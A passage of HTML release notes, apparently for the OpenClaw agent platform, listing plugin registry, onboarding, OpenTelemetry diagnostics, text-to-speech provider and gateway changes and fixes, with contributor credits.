<li>Providers/plugins: keep onboarding and auth-choice setup lists on cold manifest/install metadata and add Provider Index install metadata for not-yet-installed provider plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/plugins: keep provider setup guidance and configure auth imports on cold manifest metadata, with a regression guard against static provider-runtime imports on setup/configure list paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/capabilities: keep capability command registration from importing the models auth runtime until <code>model auth login</code> actually runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/configure: keep web-search configure prompts on cold plugin registry metadata until the user chooses managed search setup. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/chat commands: refresh the persisted plugin registry after <code>/plugins enable</code> and <code>/plugins disable</code>, matching the CLI mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: mark <code>OPENCLAW_DISABLE_PERSISTED_PLUGIN_REGISTRY</code> as a deprecated break-glass switch and point operators at registry repair instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: expand the central compatibility registry with dated owners, replacements, and maximum three-month removal targets for legacy SDK, manifest, setup, registry-migration, and agent-runtime surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/registry: ignore stale persisted registry reads when plugin policy no longer matches current config, and stamp generated registry files with a do-not-edit warning. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Config/plugins: keep plugin command-alias validation on cold manifest metadata instead of importing the runtime alias resolver. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/plugins: keep web-search credential presence checks on cold config, env, and manifest metadata instead of importing web-search provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: surface provider request identifiers as bounded hashes on model-call diagnostics and span events, without exporting raw request IDs or metric labels. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lidang-Jiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lidang-Jiang">@Lidang-Jiang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/diagnostics: add metadata-only <code>model_call_started</code> and <code>model_call_ended</code> hooks for provider/model call telemetry without exposing prompts, responses, headers, request bodies, or raw provider request IDs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: emit bounded context assembly diagnostics and export <code>openclaw.context.assembled</code> spans with prompt/history sizes but no prompt, history, response, or session-key content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export existing tool-loop diagnostics as <code>openclaw.tool.loop</code> counters and spans without loop messages, session identifiers, params, or tool output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: export diagnostic memory samples and pressure as bounded memory histograms, counters, and pressure spans to help spot leak regressions without session or payload data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.token.usage</code> histogram for input/output model usage while keeping session identifiers and aggregate cache counters out of the semantic metric. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add a bounded <code>openclaw.agent</code> label to OpenClaw token metrics so per-agent Grafana dashboards can group usage without exporting session identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oc-factus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oc-factus">@oc-factus</a>.</li>
<li>Plugins/install: consolidate managed plugin install metadata into the state-managed plugin index at <code>plugins/installs.json</code>, replacing the temporary <code>plugins/installed-index.json</code> path and removing <code>plugins.installs</code> as an authored config surface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Diagnostics/OTEL: add the GenAI <code>gen_ai.client.operation.duration</code> histogram for model-call latency in seconds with bounded provider/model/API and error attributes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add GenAI usage token attributes to model-usage spans, including cache read/write input token counts without session identifiers or prompt/response content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: include bounded GenAI operation, provider, and request-model attributes on model-usage spans so token usage remains self-describing without diagnostic identifiers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep model-usage span GenAI provider attributes aligned with the existing semantic-convention opt-in policy, using legacy <code>gen_ai.system</code> unless latest experimental GenAI conventions are enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: keep <code>gen_ai.request.model</code> present on GenAI token usage metrics with a bounded <code>unknown</code> fallback when model usage events do not include a model. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs/OTEL: document the GenAI token and model-call duration metrics, model-usage span attributes, and <code>OTEL_SEMCONV_STABILITY_OPT_IN=gen_ai_latest_experimental</code> provider-attribute behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs: refresh the MCP, model provider, doctor, troubleshooting, BlueBubbles, media generation, TTS, subagents, skills, cron/tasks, exec approvals, and voice-call guides with structured Steps, Tabs, and Accordion content.</li>
<li>Diagnostics/trace: add an internal traceparent propagation helper that only formats trusted dispatcher metadata, keeping plugin-emitted diagnostic traces out of outbound propagation by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Diagnostics/OTEL: add bounded outbound message delivery lifecycle diagnostics and export them as low-cardinality delivery spans/metrics without message body, recipient, room, or media-path data. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327526859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71471" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71471/hovercard" href="https://github.com/openclaw/openclaw/pull/71471">#71471</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: emit bounded exec-process diagnostics and export them as <code>openclaw.exec</code> spans without exposing command text, working directories, or container identifiers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327444687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71451/hovercard" href="https://github.com/openclaw/openclaw/pull/71451">#71451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Diagnostics/OTEL: support <code>OPENCLAW_OTEL_PRELOADED=1</code> so the plugin can reuse an already-registered OpenTelemetry SDK while keeping OpenClaw diagnostic listeners wired. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327404376" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71450" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71450/hovercard" href="https://github.com/openclaw/openclaw/pull/71450">#71450</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jlapenna/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jlapenna">@jlapenna</a>.</li>
<li>Providers/Xiaomi: add MiMo TTS as a bundled speech provider with MP3/WAV output and voice-note Opus transcoding. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116510361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52376" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52376/hovercard" href="https://github.com/openclaw/openclaw/issues/52376">#52376</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4149888425" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55614" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55614/hovercard" href="https://github.com/openclaw/openclaw/pull/55614">#55614</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zoujiejun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zoujiejun">@zoujiejun</a>.</li>
<li>Providers/ElevenLabs: include <code>eleven_v3</code> in the bundled TTS model catalog so model selection surfaces can offer ElevenLabs v3. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285755724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68321" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68321/hovercard" href="https://github.com/openclaw/openclaw/pull/68321">#68321</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>.</li>
<li>Providers/Local CLI TTS: add a bundled local command speech provider with file/stdout input, voice-note Opus conversion, and telephony PCM output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158165001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56239" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56239/hovercard" href="https://github.com/openclaw/openclaw/pull/56239">#56239</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solar2ain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solar2ain">@solar2ain</a>.</li>
<li>Providers/Inworld: add Inworld as a bundled speech provider with streaming TTS synthesis, voice listing, voice-note output, and PCM telephony output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4155025815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55972/hovercard" href="https://github.com/openclaw/openclaw/pull/55972">#55972</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cshape/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cshape">@cshape</a>.</li>
<li>Providers/Volcengine: add Volcengine/BytePlus Seed Speech as a bundled TTS provider with API-key auth, native Ogg/Opus voice-note output, and MP3 audio-file output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4150318584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55641" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55641/hovercard" href="https://github.com/openclaw/openclaw/pull/55641">#55641</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a>.</li>
<li>Android/Talk Mode: expose Talk Mode in the Voice tab with runtime-owned voice capture modes and microphone foreground-service escalation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-latitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-latitude">@alex-latitude</a>.</li>
<li>Providers/LiteLLM: register <code>litellm</code> as an image-generation provider so <code>image_generate model=litellm/...</code> calls and <code>agents.defaults.imageGenerationModel.fallbacks</code> entries resolve through the LiteLLM proxy. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Providers/fal: add Seedance 2.0 reference-to-video models with multi-image, video, and audio reference input mapping plus model-specific capability limits for <code>video_generate</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shivanker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shivanker">@shivanker</a>.</li>
<li>Codex harness: require Codex app-server <code>0.125.0</code> or newer and cover native MCP <code>PreToolUse</code>, <code>PostToolUse</code>, and <code>PermissionRequest</code> payloads through the OpenClaw hook relay.</li>
<li>Agents/Codex: teach prompts and <code>agents_list</code> to surface native Codex app-server availability so agents prefer <code>/codex ...</code> over Codex ACP unless ACP/acpx is explicit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>ACPX/Droid: add Factory Droid to the live ACP bind Docker matrix, including <code>.factory</code> settings staging, <code>FACTORY_API_KEY</code> forwarding, and the single-agent <code>test:docker:live-acp-bind:droid</code> recipe.</li>
<li>TTS/personas: add provider-aware TTS personas with deterministic provider binding merges, <code>/tts persona</code> controls, gateway/CLI persona state, Google Gemini <code>audio-profile-v1</code> prompt wrapping, and OpenAI instruction mapping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318374088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70748" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70748/hovercard" href="https://github.com/openclaw/openclaw/pull/70748">#70748</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barronlroth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barronlroth">@barronlroth</a>.</li>
<li>Voice Wake: add trigger-based routing so macOS voice wake phrases can select a configured agent or session target, with Gateway routing APIs and node update events. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4006394318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/30354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/30354/hovercard" href="https://github.com/openclaw/openclaw/pull/30354">#30354</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longbiaochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longbiaochen">@longbiaochen</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Plugins/CLI: let flag-driven <code>openclaw channels add</code> install the selected channel plugin from its default source without opening an interactive prompt, fixing published npm Telegram setup in stdin-closed automation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/startup: load the default <code>memory-core</code> slot during Gateway startup when permitted so active-memory recall can call <code>memory_search</code> and <code>memory_get</code> without requiring an explicit <code>plugins.slots.memory</code> entry, while preserving <code>plugins.slots.memory: "none"</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: prefer native require for compiled bundled plugin JavaScript before jiti so read-only config, status, device, and node commands avoid unnecessary transform overhead on slow hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221630999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62842/hovercard" href="https://github.com/openclaw/openclaw/issues/62842">#62842</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Effet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Effet">@Effet</a>.</li>
<li>Plugins/compat: inventory doctor-side deprecation migrations separately from runtime plugin compatibility so release sweeps preserve needed repairs while enforcing dated removal windows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: add missing dated compatibility records for legacy extension-api, memory registration, provider hook/type aliases, runtime aliases, channel SDK helpers, and approval/test utility shims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: refresh the persisted registry after managed plugin files are removed so ClawHub uninstall cannot leave stale <code>plugins list</code> entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins/CLI: make plugin install and uninstall config writes conflict-aware, clear stale denylist entries on explicit reinstall/removal, and delete managed plugin files only after config/index commit succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Plugins: fail <code>plugins update</code> when tracked plugin or hook updates error, keep bundled runtime-dependency repair behind restrictive allowlists, and reject package installs with unloadable extension entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Gateway/chat: keep duplicate attachment-backed <code>chat.send</code> retries with the same idempotency key on the documented in-flight path so aborts still target the real active run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308621432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70139/hovercard" href="https://github.com/openclaw/openclaw/issues/70139">#70139</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>Plugins: share package entrypoint resolution between install and discovery, reject mismatched <code>runtimeExtensions</code>, and cache bundled runtime-dependency manifest reads during scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Onboarding/setup: keep first-run config reads, plugin compatibility notices, and post-model sanity checks on cold metadata paths unless the user chooses to browse all models, avoiding full plugin/runtime catalog work between prompts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: run manifest-owned provider auth choices through scoped setup providers so selecting OpenAI Codex browser/device auth no longer loads every provider runtime before OAuth starts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/auth: keep the post-auth default-model policy lookup on manifest/setup metadata so the next prompt appears without loading broad provider runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Onboarding/models: keep skip-auth and provider-scoped model picker prompts off the full global model catalog path, and cache provider catalog hook resolution so setup no longer stalls after auth on large plugin registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/Bonjour: suppress known @homebridge/ciao cancellation and network assertion failures through scoped process handlers so malformed mDNS packets or restricted VPS networking disable/restart Bonjour instead of crashing the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274075946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67578/hovercard" href="https://github.com/openclaw/openclaw/issues/67578">#67578</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zenassist26-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zenassist26-create">@zenassist26-create</a>.</li>
<li>Discord: keep late clicks on already-resolved exec approval buttons quiet when elevated mode auto-resolved the request, while still surfacing real approval submission failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265667453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66906/hovercard" href="https://github.com/openclaw/openclaw/issues/66906">#66906</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rlerikse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rlerikse">@rlerikse</a>.</li>
<li>Agents/subagents: deliver completed yielded-subagent results back to no-thread requester routes via direct fallback when the dormant parent announce turn produces no visible reply, and add QA-lab coverage for the regression. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/Tailscale: let Tailscale-authenticated Control UI operator sessions with browser device identity skip the device-pairing round trip while still rejecting device-less and node-role connections. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330113557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71986/hovercard" href="https://github.com/openclaw/openclaw/issues/71986">#71986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jokedul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jokedul">@jokedul</a>.</li>
<li>Doctor: honor <code>OPENCLAW_SERVICE_REPAIR_POLICY=external</code> by reporting gateway service health while skipping service install/start/restart/bootstrap, supervisor rewrites, and legacy service cleanup for externally managed environments. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: run package post-update doctor with <code>--fix</code> so package updates repair config migrations before restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: retry failed npm global updates with <code>--omit=optional</code> and ignore the superseded first failure when the fallback succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: migrate and reset <code>plugins.slots.contextEngine</code> alongside memory slots when plugin ids change or selected plugins are removed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Discord: keep raw <code>Agent failed before reply</code> runner failures out of Discord group/channel chats and show detailed runner errors in direct chats only when <code>/verbose</code> is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>UI/Windows: quote resolved pnpm <code>.cmd</code> launcher paths before spawning UI install/build/test commands so Node installs under <code>C:\Program Files</code> no longer fail as <code>C:\Program</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072094242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45275" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45275/hovercard" href="https://github.com/openclaw/openclaw/issues/45275">#45275</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stoppieboy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stoppieboy">@stoppieboy</a>, and <a class="user-mention notranslate" data-hovercard-type="user" 